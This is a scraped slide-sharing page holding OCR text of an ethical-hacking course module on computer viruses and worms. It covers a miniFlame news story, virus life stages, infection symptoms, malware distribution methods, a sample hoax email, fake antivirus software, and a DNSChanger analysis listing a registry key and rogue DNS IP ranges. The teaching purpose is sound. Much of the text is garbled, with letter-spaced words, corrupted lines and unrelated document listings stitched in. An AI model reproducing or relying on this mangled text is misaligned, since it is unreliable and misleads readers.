Informing Innovation: Contextual Investigation for Effective Academic Technol...
PDF
YIEF-2011
PDF
Untitled-1
Understanding Online Consumer Behavior in Fashion E-commerce by the applicati...
Html + wordpress ppt.
Catchy web pages via Wordpress
Ceh v8 labs module 18 buffer overflow
H3LP DTR V.2.0.
Winload.efi.mui
Ceh v8 labs module 10 denial of service
ANALYSIS OF SUB-PARTICIPATION AGREEMENTS DAMILOLA BEN-OMOTEHINSE
4 IATA Training
Survey analysis
SIM, TIARA AYUNINGSIH, HAPZI ALI, SISTEM INFORMASI MANAJEMEN UNTUK KEUNGGULAN...
PARASITIC COMPUTING: PROBLEMS AND ETHICAL CONSIDERATION
Passivhaus on a shoestring
Backup of diccionary copy
Copywriting Social Media
Top british schools in sharjah
Writing Workshop
Informing Innovation: Contextual Investigation for Effective Academic Technol...
YIEF-2011
Untitled-1
Ad

Similar to Ce hv8 module 07 viruses and worms (20)

DOCX
Scanned by CamScannerO n e o f S w ia liz e ď s e x .docx
PDF
Castlepollard Community College Coding Workshop
PPTX
United States Neurological Biomarkers Market Growth, Demand and Challenges of...
DOCX
I A G E I S M A N D A D U L T I S M L e g i s l a t i v e .docx
PPTX
United States Sepsis Diagnostics Market by Product Type, Distribution Channel...
PPTX
Sodium Sulfur Battery Market PPT: Growth, Outlook, Demand, Keyplayer Analysis...
PDF
Endorsements
PPTX
Presentation_NVL_Island7juni2022.pptx
PPTX
Polyimide Film Market Growth, Demand and Challenges of the Key Industry Playe...
DOCX
1Terrorism is highly d e p e n d e n t o n c a s h f.docx
PPTX
United States Clean Coal Technologies Market Growth, Demand and Challenges of...
PPTX
United States Solar Power Market Growth, Demand and Challenges of the Key Ind...
PPTX
Antibacterial Glass Market Growth, Demand and Challenges of the Key Industry ...
PDF
Letter of Recommendation
PPTX
United States Hemostats Market Growth, Demand and Challenges of the Key Indus...
PPTX
United States Semiconductor Manufacturing Equipment Market by Product Type, D...
PPTX
Aircraft Cabin Interior Market Growth, Demand and Challenges of the Key Indus...
PPT
Why can't we all just get along? [Bettakultcha]
PPTX
Hemodialysis Market Growth, Demand and Challenges of the Key Industry Players...
DOCX
Scanned by CamScannerth e h e ig h t o f hy po .docx
Scanned by CamScannerO n e o f S w ia liz e ď s e x .docx
Castlepollard Community College Coding Workshop
United States Neurological Biomarkers Market Growth, Demand and Challenges of...
I A G E I S M A N D A D U L T I S M L e g i s l a t i v e .docx
United States Sepsis Diagnostics Market by Product Type, Distribution Channel...
Sodium Sulfur Battery Market PPT: Growth, Outlook, Demand, Keyplayer Analysis...
Endorsements
Presentation_NVL_Island7juni2022.pptx
Polyimide Film Market Growth, Demand and Challenges of the Key Industry Playe...
1Terrorism is highly d e p e n d e n t o n c a s h f.docx
United States Clean Coal Technologies Market Growth, Demand and Challenges of...
United States Solar Power Market Growth, Demand and Challenges of the Key Ind...
Antibacterial Glass Market Growth, Demand and Challenges of the Key Industry ...
Letter of Recommendation
United States Hemostats Market Growth, Demand and Challenges of the Key Indus...
United States Semiconductor Manufacturing Equipment Market by Product Type, D...
Aircraft Cabin Interior Market Growth, Demand and Challenges of the Key Indus...
Why can't we all just get along? [Bettakultcha]
Hemodialysis Market Growth, Demand and Challenges of the Key Industry Players...
Scanned by CamScannerth e h e ig h t o f hy po .docx
Ad

Ce hv8 module 07 viruses and worms

  • 2. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker V iru se s and W orm s M o d u le 07 Engineered by Hackers. Presented by Professionals. M E th ic a l H a c k in g a n d C o u n te rm e a s u re s v 8 M o d u le 0 7 : V iru s e s a n d W o r m s E xam 3 1 2 -5 0 M odule 07 Page 1007 Ethical Hacking and C ounterm easures Copyright © by EC-C0linCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 3. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH Secu rity N ew s I GlobalResearch H om e P ro d u c ts About 5«rv*ccs O ctobe r 1 9 ,2 0 1 2 G lo b al C y b e r-W arfa re T a c tic s : N e w F la m e -lin k e d M a lw a re used in “ C y b e r-E s p io n a g e ” A n e w c y b e r e s p io n a g e p ro g ra m lin k e d t o th e n o to r io u s F lam e and Gauss m a lw a re has bee n d e te c te d by Russia's K aspersky Lab. T he a n ti-v iru s g ia n t's c h ie f w a rn s t h a t g lo b a l c y b e r w a rfa r e is in " f u ll s w in g " a n d w ill p ro b a b ly e s c a la te in 2013. T h e v iru s , d u b b e d m in iF la m e , a n d a lso k n o w n as SPE, has a lre a d y in fe c te d c o m p u te rs in Ira n , L e b a n o n , France, t h e U n ite d S ta te s a n d L ith u a n ia . It w as dis c o v e re d in July 20 1 2 a n d is d e s c rib e d as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a s ta te m e n t p o s te d o n its w e b s ite . T he m a lw a re w a s o rig in a lly id e n tifie d as an a p p e n d a g e o f F lam e - th e p ro g ra m used f o r ta rg e te d c y b e r e spionage in th e M id d le East a n d a c k n o w le d g e d to be p a r t o f jo in t U S -ls ra e li e ffo r ts t o u n d e rm in e Iran 's n u c le a r p ro g ra m . B u t la te r, K aspersky Lab a n a ly s ts d is c o v e re d t h a t m in iF la m e is a n "interoperable tool th a t could be used as an independent malicious program, o r concurrently as a plug-in f o r both the Flame and Gauss m alw are." ^ ^ ^ ^ T h e a n a l y s i s a lso s h o w e d n e w e v id e n c e o f c o o p e ra tio n b e tw e e n th e c re a to rs o f F lam e a n d G a u s s ^ ^ ^ ^ ^ — http ://www. globa/research, ca Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. 
S e c u rity N e w s an M G lo b a l C y b e r - W a r fa r e T a c tic s : N e w M M a lw a re u s e d in F la m e - lin k e d “ C y b e r-E s p io n a g e ” S o u rc e : h t t p : / / w w w . g l o b a l r e s e a r c h . c a A n e w c y b e r e s p io n a g e p r o g r a m lin k e d t o t h e n o t o r i o u s F la m e a n d G auss m a l w a r e has b e e n d e t e c t e d b y Russia's K a s p e rsky Lab. T h e a n t i v i r u s g ia n t 's c h ie f w a r n s t h a t g lo b a l c y b e r w a r f a r e is in " f u l l s w i n g " a n d p r o b a b l y e s c a la te in 2 0 1 3 . T h e v iru s , d u b b e d m in iF la m e , a nd also k n o w n as SPE, has a lr e a d y i n f e c t e d c o m p u t e r s in Iran, L e b a n o n , F rance, t h e U n ite d States, a n d L ith u a n ia . It w a s d is c o v e r e d in July 2 0 1 2 a n d is d e s c r ib e d as "a s m a ll a n d h ig h ly f le x ib le m a lic io u s p r o g r a m d e s ig n e d t o ste a l d a ta a n d c o n t r o l in fe c te d s y s te m s d u r in g ta rg e te d cyber e s p io n a g e o p e ra tio n s ," K a sp e rsky Lab said in a s t a t e m e n t p o s te d o n its w e b s i t e . The m a lw a re w a s o r i g i n a l l y i d e n t if ie d as an a p p e n d a g e o f F lam e, t h e p ro g ra m u sed f o r t a r g e t e d c y b e r e s p io n a g e in t h e M i d d l e East a n d a c k n o w l e d g e d t o be p a r t o f j o i n t US-lsraeli e f f o r t s t o u n d e r m i n e Ira n 's n u c l e a r p r o g r a m . M odule 07 Page 1008 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 4. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker B u t la t e r , K a sp e rsky Lab a n a ly s ts d is c o v e r e d t h a t m i n i F l a m e is an " i n t e r o p e r a b l e t o o l t h a t c o u ld be used as an i n d e p e n d e n t m a lic io u s p r o g r a m , o r c o n c u r r e n t l y as a p lu g - in f o r b o t h t h e Flam e a n d Gauss m a l w a r e . " T h e a na lysis also s h o w e d n e w e v id e n c e o f c o o p e r a t i o n b e t w e e n t h e c r e a t o r s o f F la m e a nd Gauss, as b o t h v iru s e s can use m in i F la m e f o r t h e i r o p e r a t i o n s . " M i n i F l a m e ' s a b i l it y t o be used as a p lu g - in b y e i t h e r F lam e o r Gauss c le a r ly c o n n e c ts t h e c o ll a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F la m e a n d Gauss. Since t h e c o n n e c t i o n b e t w e e n F la m e a n d S t u x n e t / D u q u has a lr e a d y b e e n r e v e a le d , it can be c o n c l u d e d t h a t all th e s e a d v a n c e d t h r e a t s c o m e f r o m t h e s a m e 'c y b e r w a r f a r e ' f a c t o r y , " K a s p e r s k y Lab said. H ig h - p r e c is io n a tta c k to o l So f a r j u s t 5 0 t o 6 0 cases o f in f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d in g t o K a sp e rs ky Lab. B u t u n lik e F lam e a n d Gauss, m in iF la m e in m e a n t f o r in s t a l l a t i o n o n m a c h in e s a lr e a d y i n f e c t e d b y t h o s e v iru se s . " M i n i F l a m e is a h ig h - p r e c is io n a t t a c k t o o l . M o s t lik e ly it is a t a r g e t e d c y b e r w e a p o n used in w h a t can be d e f i n e d as t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p e rsk y's C h ie f S e c u r ity E x p e rt A l e x a n d e r G o s te v e x p la in e d . 
"F ir s t, F la m e o r Gauss a re used t o in f e c t as m a n y v i c t i m s as p o s s ib le t o c o lle c t la rg e q u a n t i t i e s o f i n f o r m a t i o n . A f t e r d a ta is c o lle c te d a n d r e v i e w e d , a p o t e n t i a l l y i n t e r e s t i n g v i c t i m is d e f i n e d a n d i d e n t if ie d , a n d m in iF la m e is in s t a lle d in o r d e r t o c o n d u c t m o r e in - d e p t h s u r v e il l a n c e a nd c y b e r-e s p io n a g e ." T h e n e w l y - d i s c o v e r e d m a l w a r e can also t a k e s c r e e n s h o t s o f an i n f e c t e d c o m p u t e r w h i l e it is r u n n i n g a s p e c ific p r o g r a m o r a p p li c a t i o n in such as a w e b b r o w s e r , M i c r o s o f t O ffic e p r o g r a m , A d o b e R eader, i n s t a n t m e s s e n g e r se rv ic e o r FTP c lie n t. K a sp e rsky Lab b e lie v e s m in i F la m e 's d e v e lo p e r s h a v e p r o b a b l y c r e a te d d o z e n s o f d i f f e r e n t m o d i f i c a t i o n s o f t h e p r o g r a m . " A t t h i s t i m e , w e h a v e o n l y f o u n d six o f th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , " t h e f i r m said. ‘C y b e r w a rfa re i n f u ll s w i n g ’ M e a n w h i l e , K a s p e rs k y Lab's c o - f o u n d e r a n d CEO E u ge n e K a s p e rs k y w a r n e d t h a t g lo b a l c y b e r w a r f a r e ta c tic s a re b e c o m i n g m o r e s o p h is t ic a t e d w h i l e also b e c o m i n g m o r e t h r e a t e n i n g . He u rg e d g o v e r n m e n t s t o w o r k t o g e t h e r t o f i g h t c y b e r w a r f a r e a n d c y b e r - t e r r o r i s m , X in h u a n e w s a g e n c y r e p o r ts . S p e a k in g a t an I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n io n T e le c o m W o r l d c o n f e r e n c e in D u b a i, t h e a n t i v i r u s t y c o o n said, " c y b e r w a r f a r e is in fu ll s w in g a nd w e e x p e c t it t o e s c a la te in 2 0 1 3 ." 
" T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said. He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is M odule 07 Page 1009 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r w h a t is b e h in d i t . " Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss, b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s . C o p y r i g h t © 2 0 0 5 - 2 0 1 2 G lo b a lR e s e a r c h .c a B y R u s s ia T o d a y http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867 M odule 07 Page 1010 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 6. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH M odule O b jectives J Introduction to Viruses J Computer Worms J Stages of Virus Life J Worm Analysis J Working of Viruses J Worm Maker J Indications of Virus Attack J Malware Analysis Procedure J How does a ComputerGet Infected by Viruses J Online Malware Analysis Services y Virus Analysis J Virus and Worms Countermeasures J Types of Viruses J Antivirus Tools J Virus Maker J Penetration Testing for Virus Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C M o d u le O b je c tiv e s T h e o b j e c t iv e o f th is m o d u l e is t o e x p o s e y o u t o t h e v a r io u s v iru s e s a n d w o r m s a v a ila b le to d a y . It g ive s y o u i n f o r m a t i o n a b o u t all t h e a v a ila b le v iru s e s a n d w o r m s . This m o d u l e e x a m in e s t h e w o r k i n g s o f a c o m p u t e r v iru s , its f u n c t i o n , c la s s ific a tio n , a n d t h e m a n n e r in w h i c h it a ffe c ts s y s te m s . T his m o d u l e w ill go i n t o d e ta il a b o u t t h e v a r io u s c o u n t e r m e a s u r e s a v a ila b le t o p r o t e c t a g a in s t th e s e v ir u s i n f e c tio n s . T h e m a in o b j e c t iv e o f th is m o d u l e is t o e d u c a t e y o u a b o u t t h e a v a ila b le v iru s e s a nd w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k a nd t h e w a y s t o p r o t e c t a g a in s t v a r io u s v iru s e s , a n d t e s t i n g y o u r s y s te m o r n e t w o r k a g a in s t v iru s e s o r w o r m s p re s e n c e . 
T his m o d u l e w i ll f a m i l i a r i z e y o u w i t h : 0 I n t r o d u c t i o n t o V iru s e s 0 C o m p u te r W o rm s 0 Stages o f V ir u s Life 0 W o r m A n a ly s is 0 W o r k i n g o f V iru s e s 0 W o rm M aker 0 I n d ic a tio n s o f V ir u s A t t a c k 0 M a l w a r e A n a ly s is P r o c e d u r e 0 How 0 O n lin e M a l w a r e A n a ly s is Services 0 V ir u s a nd W o r m s D oes a C o m p u te r V iru se s? 0 T y p e s o f V iru s e s In f e c t e d by C o u n te rm e a su re s V ir u s A n a ly s is 0 Get Modute07 !M a k e r 0 A n t i v i r u s T o o ls Ethical H a c k if^ a n P ^ f i t F i S t i a n e T e ^ Q g t f e f y V i F W f i l l C i l All Rights Reserved. Reproduction is S trictly Prohibited.
  • 7. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Module Flow Virus and Worms Concepts Typ e s of Viruses Penetration Testing Com puter Worms Countermeasures M alware Analysis Copyright © by E&Ctlllcil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le F lo w T his s e c tio n in t r o d u c e s y o u t o v a r io u s v iru s e s a n d w o r m s a v a ila b le t o d a y a n d g ive s y o u a b r i e f o v e r v i e w o f e a ch v ir u s a n d s t a t i s t i c s o f v iru s e s a n d w o r m s in t h e r e c e n t y e a rs. It lists v a r io u s t y p e s o f v iru s e s a nd t h e i r e f fe c ts o n y o u r s y s te m . T h e w o r k i n g o f v iru s e s in e a c h p h a s e has w i ll be d iscu sse d in d e ta il. T h e t e c h n i q u e s used b y t h e a t t a c k e r t o d i s t r i b u t e m a l w a r e o n t h e w e b a re h ig h lig h t e d . M alware Analysis V ir u s a n d W o r m s C o n c e p t ,‫• נ‬ Types of Viruses ‫— /י‬ Computer W orm s fj| Countermeasures ||‫־‬ ^ Penetration Testing V ‫— ׳׳‬ M odule 07 Page 1012 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 8. Introduction to Viruses
  A virus is a self-replicating program that produces its own copy by attaching itself to another program, a computer boot sector, or a document. Viruses are generally transmitted through file downloads, infected disk/flash drives, and email attachments.
  Virus characteristics: infects other programs; alters data; transforms itself; corrupts files and programs; encrypts itself; self-propagates.
  Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that produces its own code by attaching copies of itself to other executable code. The virus operates without the knowledge or desire of the user. Like a real virus, a computer virus is contagious and can contaminate other files. However, viruses can infect outside machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical condition is met.
  There are three categories of malicious programs:
  - Trojans and rootkits
  - Viruses
  - Worms
  A worm is a malicious program that can infect both local and remote machines. Worms spread automatically by infecting system after system in a network, and even spread further to other networks. Therefore, worms have a greater potential for causing damage because they do not rely on the user's actions for execution. There are also malicious programs in the wild that contain all of the features of these three categories of malicious programs.
  • 9. Virus and Worm Statistics
  Source: http://www.av-test.org
  This graphical representation gives detailed information on the attacks that have occurred in recent years. According to the graph, only 11,666,667 systems were affected by viruses and worms in the year 2008, whereas in the year 2012 the count drastically increased to 70,000,000 systems, which means that the growth of malware attacks on systems is increasing exponentially year by year.
  • 10. FIGURE 7.1: Virus and Worm Statistics (y-axis: number of affected systems, 0 to 75,000,000; x-axis: years 2008 to 2012)
  • 11. Stages of Virus Life
  Computer virus attacks spread through various stages from inception to design to elimination.
  1. Design: The virus code is developed using programming languages or construction kits. Anyone with basic programming knowledge can create a virus.
  2. Replication: The virus first replicates itself within a target system over a period of time.
  3. Launch: It is activated when a user performs certain actions, such as triggering or running an infected program.
  4. Detection: The virus is identified as a threat infecting target systems. Its actions cause considerable damage to the target system's data.
  • 12. 5. Incorporation: Antivirus software developers assemble defenses against the virus.
  6. Elimination: Users are advised to install antivirus software updates, thus creating awareness among user groups.
  • 13. Working of Viruses: Infection Phase
  In the infection phase, the virus replicates itself and attaches to an .exe file in the system.
  Viruses attack a target host's system by using various methods. They attach themselves to programs and transmit themselves to other programs by making use of certain events. Viruses need such events to take place since they cannot:
  - Self-start
  - Infect other hardware
  - Cause physical damage to a computer
  - Transmit themselves using non-executable files
  Generally, viruses have two phases: the infection phase and the attack phase. In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection can enable virus functionality to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads to the virus code. Virus writers have to maintain a balance among factors such as:
  - How will the virus infect?
  - How will it spread?
  - How will it reside in a target computer's memory without being detected?
  • 14. Obviously, viruses have to be triggered and executed in order to function. There are many ways to execute programs while a computer is running. For example, any setup program calls for numerous programs that may be built into a system, and some of these are distribution-medium programs. Thus, if a virus program already exists, it can be activated by this kind of execution and infect the additional setup program as well. There are virus programs that infect and keep spreading every time they are executed. Some programs do not infect other programs when first executed; they reside in a computer's memory and infect programs at a later time. Such virus programs, known as TSR (terminate-and-stay-resident) viruses, wait for a specified trigger event to spread at a later stage. It is, therefore, difficult to recognize which event might trigger the execution of a dormant virus infection.
  Refer to the figure that follows to see how EXE file infection works. In the following figure, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code too, along with the application program, as soon as it is run.
  - A file virus infects by attaching itself to an executable system application program. Text files such as source code, batch files, script files, etc., are considered potential targets for virus infections.
  - Boot sector viruses execute their own code first, before the target PC is booted.
  FIGURE 7.2: Working of Viruses in Infection Phase (Before Infection: clean .exe file; After Infection: virus-infected file)
  • 15. Working of Viruses: Attack Phase
  Viruses are programmed with trigger events to activate and corrupt systems. Some viruses infect each time they are run, and others infect only when a certain predefined condition is met, such as a user's specific task, a day, a time, or a particular event.
  Once viruses spread themselves throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that need to be activated to corrupt the host system. Some viruses have bugs that replicate themselves and perform activities such as deleting files and increasing session time. They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:
  - Deleting files and altering content in data files, thereby causing the system to slow down
  - Performing tasks not related to applications, such as playing music and creating animations
  • 16. FIGURE 7.3: Working of Viruses in Attack Phase (Unfragmented file before attack: File A pages 1-3 followed by File B pages 1-3; file fragmented due to virus attack: pages of File A and File B interleaved out of order)
  Refer to this figure, which has two files, A and B. In section one, the two files are located one after the other in an orderly fashion. Once a virus code infects the file, it alters the positioning of the files that were consecutively placed, thus leading to inaccuracy in file allocations and causing the system to slow down as users try to retrieve their files. In this phase:
  - Viruses execute when some events are triggered
  - Some execute and corrupt via built-in bug programs after being stored in the host's memory
  - Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent
  • 17. Why Do People Create Computer Viruses?
  Slide summary: inflict damage to competitors; financial benefits; research projects; play pranks; vandalism; cyber terrorism; distribute political messages.
  Source: http://www.securitydocs.com
  Computer viruses are not self-generated, but are created by cyber-criminal minds and intentionally designed to cause destructive occurrences in a system. Generally, viruses are created with a disreputable motive. Cyber-criminals create viruses to destroy a company's data, as an act of vandalism or a prank, or to destroy a company's products. However, in some cases, viruses are actually intended to be good for a system. These are designed to improve a system's performance by deleting previously embedded viruses from files. Some reasons viruses have been written include:
  - Inflict damage to competitors
  - Research projects
  - Pranks
  - Vandalism
  - Attack the products of specific companies
  - Distribute political messages
  - Financial gain
  • 18.
  - Identity theft
  - Spyware
  - Cryptoviral extortion
  • 19. Indications of Virus Attacks
  Slide summary: processes take more resources and time; the computer slows down when programs start; the computer freezes frequently or encounters errors.
  An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the machines of the users who receive them. A virus can also make good use of file servers in order to infect files. The following are indications of a virus attack on a computer system:
  - Programs take longer to load
  - The hard drive is always full, even without installing any programs
  - The floppy disk drive or hard drive runs when it is not being used
  - Unknown files keep appearing on the system
  - The keyboard or the computer emits strange or beeping sounds
  - The computer monitor displays strange graphics
  - File names turn strange, often beyond recognition
  - The hard drive becomes inaccessible when trying to boot from the floppy drive
  - A program's size keeps changing
  - The memory on the system seems to be in use and the system slows down
  • 20. How Does a Computer Get Infected by Viruses?
  Slide summary: when a user accepts files and downloads without checking properly for the source; opening infected e-mail attachments; installing pirated software; not updating and not installing new versions of plug-ins; not running the latest anti-virus application.
  There are many ways in which a computer gets infected by viruses. The most popular methods are as follows:
  - When a user accepts files and downloads without checking properly for the source.
  - Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. If the victim opens the mail, the virus automatically infects the system.
  - Attackers incorporate viruses in popular software programs and upload the infected software to websites intended for software downloads. When the victim downloads the infected software and installs it, the system gets infected.
  - Failing to install new versions or update with the latest patches intended to fix known bugs may expose your system to viruses.
  - As technology advances, attackers also design new viruses. Failing to use the latest antivirus applications may expose you to virus attacks.
  • 21. Common Techniques Used to Distribute Malware on the Web
  Source: Security Threat Report 2012 (http://www.sophos.com)
  - Blackhat Search Engine Optimization (SEO): Using this technique, the attacker ranks malware pages highly in search results.
  - Social Engineered Click-jacking: The attackers trick users into clicking on innocent-looking web pages that contain malware.
  - Spearphishing Sites: This technique is used for mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials.
  - Malvertising: Embedding malware in ad networks that display across hundreds of legitimate, high-traffic sites.
  - Compromised Legitimate Websites: Hosting embedded malware that spreads to unsuspecting visitors.
  - Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by the user visiting a web page.
  • 22. Virus Hoaxes and Fake Antiviruses
  Hoaxes are false alarms claiming reports about a non-existing virus, and may themselves contain virus attachments. They propagate warning messages that a certain email message should not be viewed and that doing so will damage one's system. Attackers disguise malware as an antivirus and trick users into installing it on their systems. Once installed, these fake antiviruses can damage target systems similarly to other malware.
  Virus Hoaxes
  A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals send to create havoc. It is fairly common for innocent users to pass these phony messages along, thinking they are helping others avoid the "virus."
  - Hoaxes are false alarms claiming reports about non-existing viruses
  - These warning messages, which can be propagated rapidly, state that a certain email message should not be opened and that doing so would damage one's system
  - In some cases, these warning messages themselves contain virus attachments
  - These possess the capability of vast destruction on target systems
  Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how one would become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.
  • 23. Try to cross-check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:
  - If it is posted by newsgroups that are suspicious, cross-check the information with another source
  - If the person who has posted the news is not a known person in the community or an expert, cross-check the information with another source
  - If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation
  - One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites
  - If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information
  Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS
  PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS! You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEIJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS E-MAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US. End-of-mail. Thanks.
  FIGURE 7.3: Hoaxes Warning Message
  Fake Antiviruses
  A fake antivirus is a method hackers use to affect a system; it can poison your system and corrupt the registry and system files to allow the attacker to take full control of, and access to, your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear in different browsers and warn users that they have various security threats on their system, and this message is backed up by real suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to payment details. These fake antivirus programs have been fabricated in such a way that they draw the attention of the unsuspecting user into installing the software. Some of the methods used to extend the usage and installation of fake antivirus programs include:
  - Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prompt the user to open the attachments for software installation.
  • 24.
  - Search engine optimization: Attackers generate pages related to popular or current search terms and plant them to appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
  - Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.
  FIGURE 7.4: Example of a Fake Antivirus
  • 25. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus Analysis: DNSChanger DNSChanger (Alureon) modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information CEH J <W > It acts as a bot and can be organized into a BotNet and controlled from a remote location J It spreads through emails, social engineering tricks, and untrusted downloads from the Internet UHU $ DNSChanger malware achieves the DNS redirection by modifying the following registry key settings against a interface device such as network card HKEY_LOCAL_MACHINESYSTEMCurrentControl SetServicesTcpipParameterslnterfaces%Ra ndom C %NameServer LSID t J <K > DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that as part of the BotNet takedown the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names http://www. totaldefense. com Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. V iru s A n a ly sis: D N S C h a n g e r S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m D N S C h a n g e r ( A l u r e o n ) is m a l w a r e t h a t s p re a d s t h r o u g h e m a ils , s o c ia l e n g i n e e r i n g tr i c k s , a nd u n t r u s t e d d o w n l o a d s f r o m t h e I n t e r n e t . It a cts as a b o t a n d can be o rg a n iz e d i n t o a b o t n e t a nd c o n t r o l l e d f r o m a r e m o t e l o c a tio n . T his m a l w a r e a c h ie v e s DNS r e d i r e c t i o n b y m o d i f y i n g t h e s y s te m r e g is t r y k e y s e ttin g s a g a in s t an i n t e r f a c e d e v ic e such as n e t w o r k c a rd . 
DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the botnet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. The malware can also modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.
• 26. Virus Analysis: DNSChanger (Cont'd)
Source: http://www.totaldefense.com
The rogue DNS servers can exist in any of the following ranges:
64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
• 27. FIGURE 7.5: Virus Analysis Using DNSChanger (the figure shows: the victim asks "What is the IP address of www.xsecurity.com?"; the DNS request goes to 64.28.176.2; the attacker runs a DNS server in Russia at IP 64.28.176.2; DNSChanger infects the victim's computer by changing her DNS IP address to 64.28.176.2; the fake website is at IP 65.0.0.2; DNSChanger sniffs the credential and redirects the request to the real website www.xsecurity.com at IP 200.0.0.45)
